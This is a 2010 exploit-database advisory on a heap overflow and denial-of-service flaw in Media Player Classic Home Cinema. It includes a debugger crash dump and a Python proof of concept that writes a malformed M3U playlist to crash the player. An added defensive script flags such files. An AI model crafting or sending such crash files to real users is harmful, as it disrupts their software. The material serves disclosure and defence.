
Media Player Classic Heap Overflow/DoS Vulnerability

Posted on 26 July 2010

Tested on: Media Player Classic - Home Cinema
Build number: 1.3.1333.0
MPC Compiler: VS 2008
FFmpeg Compiler: GCC 4.4.1

###################CRASH REPORT START##################
ModLoad: 77be0000 77bf5000   C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000   C:\WINDOWS\system32\midimap.dll
ModLoad: 73ee0000 73ee4000   C:\WINDOWS\system32\KsUser.dll
ModLoad: 10000000 100fb000   C:\Program Files\K-Lite Codec Pack\Filters\vsfilter.dll
ModLoad: 590b0000 590ce000   C:\WINDOWS\system32\wmpasf.dll
ModLoad: 71b20000 71b32000   C:\WINDOWS\system32\MPR.dll
ModLoad: 6bf50000 6bfcd000   C:\WINDOWS\system32\dxmasf.dll
ModLoad: 02530000 0257f000   C:\WINDOWS\system32\DRMClien.DLL
(6dc.cec): C++ EH exception - code e06d7363 (!!! second chance !!!)
............................... ISSUE
eax=01c2f2e4 ebx=80040218 ecx=00000000 edx=00200003 esi=01c2f36c edi=003fd08c
eip=7c812aeb esp=01c2f2e0 ebp=01c2f334 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
kernel32!RaiseException+0x52:
7c812aeb 5e pop esi
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:004> g
WARNING: Continuing a non-continuable exception
(6dc.cec): Break instruction exception - code 80000003 (first chance)
eax=01c2f2e4 ebx=80040218 ecx=00000000 edx=00200003 esi=00000000 edi=003fd08c
eip=0071d14b esp=01c2f37c ebp=01c2f39c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mpc_hc+0x31d14b:
0071d14b cc int 3
###################CRASH REPORT END##################

For images related to the vulnerability, refer to my blog: http://darshanams.blogspot.com

##########PoC Start################
print(" *****Program need to be run on Python 3.1*****")
print("""Media Player Classic - Home Cinema 1.3.1333.0 M3U File DoS (0-Day)
Tested on: Windows XP SP3
Media Player Classic - Home Cinema
Build number: 1.3.1333.0
MPC Compiler: VS 2008
FFmpeg Compiler: GCC 4.4.1
""")

# Playlist content: the marker "EXTM3U" followed by 1000 "D" characters
head = "EXTM3U"
buf = "D" * 1000
mal_buf = head + buf
#print("mal_buf:", mal_buf)

try:
    # Write the test playlist to the current directory
    mpc_mal = open("mpc_m3u_crash.m3u", 'w')
    mpc_mal.write(mal_buf)
    mpc_mal.close()
    print("File Created Successfully: mpc_m3u_crash.m3u ")
except OSError:
    # The file could not be opened or written
    print("Cannot Create M3U File ")

print("[+] Found and Coded by: Praveen Darshanam ")
##########PoC End################

Best Regards,
Praveen Darshanam,
Security Researcher

# Inj3ct0r.com [2010-07-26]
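
Added example, not part of the original advisory: a pre-open triage check that flags playlist files with the two properties visible in the PoC output above (an "EXTM3U" marker without the leading "#", and a single very long line). The advisory does not say which property triggers the crash, so both checks are heuristics; the function names, MAX_LINE_LEN, MAX_READ and the sample inputs are assumptions made for this example.

```python
"""Pre-open triage for .m3u files shaped like the PoC output (added example)."""
import sys

MAX_LINE_LEN = 512        # assumed ceiling for one playlist entry; tune locally
MAX_READ = 1 << 20        # assumed read cap so a huge file cannot stall triage


def triage_m3u(data: bytes, max_line_len: int = MAX_LINE_LEN) -> list:
    """Return findings for raw playlist bytes; an empty list means nothing flagged."""
    findings = []
    text = data.decode("utf-8", errors="replace").lstrip("\ufeff")
    lines = text.splitlines()
    # The PoC writes "EXTM3U" with no leading "#", so the marker is malformed.
    if lines and lines[0].startswith("EXTM3U"):
        findings.append("header-missing-hash")
    # The PoC puts its whole 1000-character run on one line with no newline.
    for number, line in enumerate(lines, start=1):
        if len(line) > max_line_len:
            findings.append("overlong-line:%d:%d" % (number, len(line)))
    return findings


def triage_file(path: str) -> list:
    """Triage a file on disk, reading at most MAX_READ bytes."""
    with open(path, "rb") as handle:
        return triage_m3u(handle.read(MAX_READ))


# Constructed samples: an ordinary extended playlist and a PoC-shaped one.
BENIGN = b"#EXTM3U\n#EXTINF:215,Artist - Title\nC:\\Music\\track01.mp3\n"
POC_SHAPED = b"EXTM3U" + b"D" * 1000

if __name__ == "__main__":
    for target in sys.argv[1:]:
        result = triage_file(target)
        print(target, "FLAGGED " + ", ".join(result) if result else "ok")
```

Run it with one or more playlist paths as arguments, for example on a mail or download quarantine directory, before the files reach a player.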
